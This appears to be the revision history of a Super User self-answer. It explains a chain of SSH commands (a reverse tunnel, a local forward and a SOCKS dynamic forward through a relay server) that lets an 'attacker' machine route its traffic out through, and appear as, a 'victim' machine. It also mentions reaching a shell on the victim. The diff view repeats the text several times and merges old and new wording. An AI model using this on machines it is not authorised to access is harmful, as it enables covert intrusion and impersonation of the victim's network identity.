Skip to main content
Super User

Return to Answer

Restructure (Some explanations were not with the correct example), and add formatting
Source Link
edit approved Feb 2, 2018 at 23:24
jpaugh
edit approved Feb 2, 2018 at 23:24
jpaugh
  • 1.4k
  • 10
  • 20

AppearantlyApparently nobody can answersanswer this questionsquestion, that's okay because I found the answer myself.

  • On 'victim': ssh -N -f -R 5555:localhostvictim:22 -p <port_of_serv> <ip_of_serv>ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #1: ssh (-N -f) -L 4444:localhostattacker #1:5555 -p <port_of_serv> <ip_of_serv>ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On 'attacker'attacker #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhostssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On 'attacker'attacker #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set the host localhost with port 3333 up for will be tunneled via serv to the victim and when you visit something like myip.comhttp://myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the 'attacker' attacker (if you setup socks settings for the specific app or for the system as a whole) which will be tunneled via 'serv'serv to 'victim'victim and you'll act as the 'victim'victim as such.

The mistake I made in my thoughprocessthought process was that I didn't really understand the way the reversed port scheme looks like, I will try to explain it in simple terms.

Victim action

ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port 22 on victim. If you've setup victim to have ssh run on port 2222 you should change 22 to 2222.
  • -p = port on which ssh on serv is running.

1st attack action

ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`

1st command: TheThe 1st command you make on 'attacker'attacker (-L 4444:localhost:5555-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right thrue to 'victim'victim. (This is just for Dynamic port forwarding / Socks applications) If

If you just want to have shell access on 'victim'victim instead of this command you just ssh in to serv & than run command: 'ssh user_on_victim@localhost -p 5555'. But

But we don't want shell access, we want to tunnel all data dynamiclydynamically so we have to make a portforwardport-forward.

Or the schematic explanation:

Or the schematic explanation

  • -N-L = I'm not going to run commands in the shell
  • local port-f = put the process in the backgroundforwarding (so you can close the terminal windowon serv)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to- 4444:localhost:5555 put all data forward to port '22' on 'victim'. If you've setup victim to have ssh runcoming in on port '2222' you should change '22'4444 to '2222'.
  • -p = port on which ssh on 'serv' is running5555.

2nd attack action

The 2nd command you make on 'attacker' (sshattacker

ssh -p 4444 -D localhost:3333 user_on_victim@localhost) is

is the actuallactual command thatsthat's going to initialise the connecting thruethrough the 2 tunnels. What you do is you say: connect to port 4444 and put all the data thats commingthat's coming in on (localhost port 3333) to 4444. (which will be put thruethrough locally on 'serv'serv to port 5555 -> which will be pushed out to port 22 on 'victim'victim.

Or the schematic explanation:

Or the schematic explanation

  • -L-D = local portforwarding (on 'serv')Dynamic forwarding
    • 4444:localhost:5555 put all data comming in on port 4444 to port 5555.
    localhost:3333 = listen on port 3333 and push data through ssh connection to port 4444 to serv.
  • -p 4444 = the port on which serv is listening to put the data forward to port 5555 and than out to port 22 on victim.

3rd attack action

Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)

The 3rd action on 'attacker'attacker is the actual data you're going to tunnel to 'victim'victim. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.

Or the schematic explanation:

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data thrue ssh connnection to port 4444 to serv.
  • -p 4444 = the port on which 'serv' is listening to put the data forward to port 5555 and than out to port 22 on 'victim'.

Last thing you have to do:

  • Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)

Appearantly nobody can answers this questions, that's okay because I found the answer myself.

  • On 'victim': ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On 'attacker' #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set the host localhost with port 3333 up for will be tunneled via serv to the victim and when you visit something like myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the 'attacker' (if you setup socks settings for the specific app or for the system as a whole) which will be tunneled via 'serv' to 'victim' and you'll act as the 'victim' as such.

The mistake I made in my thoughprocess was that I didn't really understand the way the reversed port scheme looks like, I will try to explain it in simple terms.

1st command: The 1st command you make on 'attacker' (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right thrue to 'victim'. (This is just for Dynamic port forwarding / Socks applications) If you just want to have shell access on 'victim' instead of this command you just ssh in to serv & than run command: 'ssh user_on_victim@localhost -p 5555'. But we don't want shell access, we want to tunnel all data dynamicly so we have to make a portforward.

Or the schematic explanation:

  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port '22' on 'victim'. If you've setup victim to have ssh run on port '2222' you should change '22' to '2222'.
  • -p = port on which ssh on 'serv' is running.

The 2nd command you make on 'attacker' (ssh -p 4444 -D localhost:3333 user_on_victim@localhost) is the actuall command thats going to initialise the connecting thrue the 2 tunnels. What you do is you say: connect to port 4444 and put all the data thats comming in on (localhost port 3333) to 4444. (which will be put thrue locally on 'serv' to port 5555 -> which will be pushed out to port 22 on 'victim'.

Or the schematic explanation:

  • -L = local portforwarding (on 'serv')
    • 4444:localhost:5555 put all data comming in on port 4444 to port 5555.

The 3rd action on 'attacker' is the actual data you're going to tunnel to 'victim'. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.

Or the schematic explanation:

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data thrue ssh connnection to port 4444 to serv.
  • -p 4444 = the port on which 'serv' is listening to put the data forward to port 5555 and than out to port 22 on 'victim'.

Last thing you have to do:

  • Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)

Apparently nobody can answer this question, that's okay because I found the answer myself.

  • On victim: ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On attacker #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On attacker #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On attacker #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set the host localhost with port 3333 up for will be tunneled via serv to the victim and when you visit something like http://myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the attacker (if you setup socks settings for the specific app or for the system as a whole) which will be tunneled via serv to victim and you'll act as the victim as such.

The mistake I made in my thought process was that I didn't really understand the way the reversed port scheme looks like, I will try to explain it in simple terms.

Victim action

ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port 22 on victim. If you've setup victim to have ssh run on port 2222 you should change 22 to 2222.
  • -p = port on which ssh on serv is running.

1st attack action

ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`

The 1st command you make on attacker (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right thrue to victim. (This is just for Dynamic port forwarding / Socks applications)

If you just want to have shell access on victim instead of this command you just ssh in to serv & than run command: 'ssh user_on_victim@localhost -p 5555'.

But we don't want shell access, we want to tunnel all data dynamically so we have to make a port-forward.

Or the schematic explanation

  • -L = local port-forwarding (on serv)
  • - 4444:localhost:5555 put all data coming in on port 4444 to port 5555.

2nd attack action

The 2nd command you make on attacker

ssh -p 4444 -D localhost:3333 user_on_victim@localhost

is the actual command that's going to initialise the connecting through the 2 tunnels. What you do is you say: connect to port 4444 and put all the data that's coming in on (localhost port 3333) to 4444. (which will be put through locally on serv to port 5555 -> which will be pushed out to port 22 on victim.

Or the schematic explanation

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data through ssh connection to port 4444 to serv.
  • -p 4444 = the port on which serv is listening to put the data forward to port 5555 and than out to port 22 on victim.

3rd attack action

Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)

The 3rd action on attacker is the actual data you're going to tunnel to victim. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.

Source Link
iz0r
iz0r
  • 21
  • 1

Appearantly nobody can answers this questions, that's okay because I found the answer myself.

Here is the answers:

  • On 'victim': ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #1: ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
  • On 'attacker' #2: ssh -p 4444 -D localhost:3333 user_on_victim@localhost
  • On 'attacker' #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333

Every application you set the host localhost with port 3333 up for will be tunneled via serv to the victim and when you visit something like myip.com you'll see the ip/host of the victim. From here on you can even use GUI applications on the 'attacker' (if you setup socks settings for the specific app or for the system as a whole) which will be tunneled via 'serv' to 'victim' and you'll act as the 'victim' as such.

The mistake I made in my thoughprocess was that I didn't really understand the way the reversed port scheme looks like, I will try to explain it in simple terms.

1st command: The 1st command you make on 'attacker' (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right thrue to 'victim'. (This is just for Dynamic port forwarding / Socks applications) If you just want to have shell access on 'victim' instead of this command you just ssh in to serv & than run command: 'ssh user_on_victim@localhost -p 5555'. But we don't want shell access, we want to tunnel all data dynamicly so we have to make a portforward.

Or the schematic explanation:

  • -N = I'm not going to run commands in the shell
  • -f = put the process in the background (so you can close the terminal window)
  • -R = reversed tunnel
  • 5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port '22' on 'victim'. If you've setup victim to have ssh run on port '2222' you should change '22' to '2222'.
  • -p = port on which ssh on 'serv' is running.

The 2nd command you make on 'attacker' (ssh -p 4444 -D localhost:3333 user_on_victim@localhost) is the actuall command thats going to initialise the connecting thrue the 2 tunnels. What you do is you say: connect to port 4444 and put all the data thats comming in on (localhost port 3333) to 4444. (which will be put thrue locally on 'serv' to port 5555 -> which will be pushed out to port 22 on 'victim'.

Or the schematic explanation:

  • -L = local portforwarding (on 'serv')
    • 4444:localhost:5555 put all data comming in on port 4444 to port 5555.

The 3rd action on 'attacker' is the actual data you're going to tunnel to 'victim'. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.

Or the schematic explanation:

  • -D = Dynamic forwarding
  • localhost:3333 = listen on port 3333 and push data thrue ssh connnection to port 4444 to serv.
  • -p 4444 = the port on which 'serv' is listening to put the data forward to port 5555 and than out to port 22 on 'victim'.

Last thing you have to do:

  • Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)

I hope someone finds use in my explanation.

Have a nice day....